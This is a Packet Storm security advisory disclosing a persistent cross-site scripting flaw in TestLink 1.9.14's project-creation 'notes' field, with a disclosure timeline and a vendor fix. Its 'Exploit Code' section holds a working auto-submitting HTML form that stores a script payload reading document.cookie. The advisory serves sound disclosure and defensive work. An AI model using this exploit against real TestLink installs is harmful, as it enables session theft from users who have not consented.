TestLink 1.9.14 Cross Site Scripting

2015-11-09T00:00:00
ID PACKETSTORM:134279
Type packetstorm
Reporter Aravind C Ajayan
Modified 2015-11-09T00:00:00

Description

                                        
                                            `Information  
=================================  
Name: Persistent XSS Vulnerability in TestLink 1.9.14  
Affected Software: TestLink  
Affected Versions: 1.9.14 and possibly below  
Vendor Homepage: http://testlink.org/  
Severity: High  
Status: Fixed  
  
  
Vulnerability Type:  
=================================  
Persistent XSS  
  
  
CVE Reference:  
=================================  
Not assigned  
  
  
Technical Details:  
=================================  
Persistent XSS entry point exist in TestLink 1.9.14 allowing arbitrary  
client side browser  
code execution on victims who visit persistently stored XSS payloads.  
The vulnerability has been  
discovered in the POST request to create a new Test Project. By  
exploiting the vulnerability,  
the attacker will get access to the logged in users session cookie. No  
Filtering exist on the  
vulnerable parameter.  
  
  
Vulnerable Parameter:  
=================================  
notes  
  
  
Exploit Code  
=================================  
  
<html lang="en">  
<head>  
<title>Exploit Persistent XSS TestLink 1.9.14</title>  
</head>  
<body>  
<form action="http://localhost/testlink_1_9_14/lib/project/projectEdit.php"  
id="formid" method="post">  
<input type="hidden" name="CSRFName" value="" />  
<input type="hidden" name="CSRFToken" value="" />  
<input type="hidden" name="copy_from_tproject_id" value="0" />  
<input type="hidden" name="tprojectName" value="c1" />  
<input type="hidden" name="tcasePrefix" value="c2" />  
<input type="hidden" name="notes"  
value="<script>alert(document.cookie)</script>" />  
<input type="hidden" name="optPriority" value="on" />  
<input type="hidden" name="optAutomation" value="on" />  
<input type="hidden" name="active" value="on" />  
<input type="hidden" name="is_public" value="on" />  
<input type="hidden" name="doAction" value="doCreate" />  
<input type="hidden" name="tprojectID" value="0" />  
<input type="hidden" name="doActionButton" value="Create" />  
</form>  
<script>  
document.getElementById('formid').submit();  
</script>  
</body>  
</html>  
  
  
Exploitation Technique:  
===================================  
Remote  
  
  
Severity Level:  
===================================  
High  
  
  
Advisory Timeline  
===================================  
Sat, 7 Nov 2015 13:14:33 +0530 - First Contact  
Sat, 7 Nov 2015 08:52:14 +0100 - Vendor Response  
Sat, 7 Nov 2015 13:00:54 +0100 - Vendor Fixed  
Sun, 8 Nov 2015 19:03:00 +0530 - Public Disclosure  
  
  
Solution  
====================================  
This vulnerability is fixed in TestLink 1.9.15 (Tauriel)  
Fix: https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/1cb1f78f1a50f6e6819bcbadeae345eb3213c487  
  
Credits & Authors  
====================================  
Aravind C Ajayan, Boney S Kalarickal  
`